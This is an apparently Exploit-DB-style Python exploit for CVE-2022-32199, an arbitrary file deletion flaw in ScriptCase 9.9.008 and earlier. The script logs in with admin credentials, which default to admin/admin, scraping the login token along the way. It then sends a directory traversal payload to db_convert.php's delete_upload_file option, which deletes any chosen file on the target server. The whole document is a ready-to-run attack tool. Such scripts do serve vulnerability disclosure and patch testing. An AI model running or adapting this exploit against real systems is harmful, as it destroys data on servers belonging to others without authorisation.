#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Exploit Title: ScriptCase <= 9.9.008 - Arbitrary File Deletion
#
# Exploit Author: Toxi4
# CVE: CVE-2022-32199
# Date: 2023/03/26
# Vulnerability discovered by Anton Kartunov
# Vendor Homepage: https://www.scriptcase.net
# Software Link: https://downloads.scriptcase.net/v9/packs/scriptcase_install_en_us_v9.9.008-php8.1.exe
# Version: <= 9.9.008
# Tested on: Windows7x64 - ScriptCase 9.9.008 - Arbitrary File Deletion
#
# ScriptCase <= 9.9.008 is vulnerable to
# Arbitrary File Deletion by an admin
# via a directory traversal sequence in the file parameter
#
# Usage example: python3 CVE-2022-32199.py -t 127.0.0.1 -u admin -p admin -path windows/win.ini 

import requests
import argparse
import sys
import re

help = "ScriptCase <= 9.9.008 - Arbitrary File Deletion"
parser = argparse.ArgumentParser(description=help)
parser.add_argument("-t", "--target", help="Target IP", required=True)
parser.add_argument("-u", "--username", help="Username", default="admin")
parser.add_argument("-p", "--password", help="Password", default="admin")
parser.add_argument("-path", help="File to delete")

args = parser.parse_args()

host = args.target
username = args.username
password = args.password
path = args.path

basepath = "/scriptcase"
port = 8092 # Default Port
s = requests.Session()

headers = {'Content-Type': 'application/x-www-form-urlencoded'}

def get_auth_token():
    url = "http://{}:{}{}/devel/iface/login.php".format(host, port, basepath)
    try:
        get_token = s.get(url)
        token = re.search('name="form_login" value="([\w\W]*?)"', str(get_token.content)).group(1)
        return token
    except Exception as e:
        print("[-] Can't find token")
        sys.exit(1)

def auth(token):
    url = "http://{}:{}{}/devel/iface/login.php".format(host, port, basepath)
    url2 = "http://{}:{}{}/devel/iface/login.php?rand=a35a0d78d62a011e".format(host, port, basepath)
    data = "ajax=nm&option=login&field_user={USR}&field_pass={PASS}&form_login={TOKEN}&language=ru_ru&keep_logged=false".format(USR = username, PASS = password, TOKEN = token)
    data2 = "field_user={USR}&field_pass={PASS}&form_login={TOKEN}&change_lang=ru_ru".format(USR = username, PASS = password, TOKEN = token) 
    try:
        auth = s.post(url, data=data, headers = headers)
        s.post(url2, data=data2, headers = headers)
        print("[+] Authorization successful")
        return 1
    except Exception as e:
        print("[-] Can't authorize")
        sys.exit(2)

def AFD():
    url = "http://{}:{}{}/devel/iface/db_convert.php".format(host, port, basepath)
    data = "nm_ajax=1&nm_option=delete_upload_file&file=../../../../../../../../../../{PATH}".format(PATH = path)
    try:
        s.post(url, headers=headers, data=data)
        print("[+] File {} successfuly deleted"	.format(path))
    except Exception as e:
        print("[-] Can't delete selected file")

def main():
    token = get_auth_token()
    if auth(token):
        AFD()
    else:
        print("[-] Can't authorize")

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print('Interrupted by users...')
    except:
        sys.exit()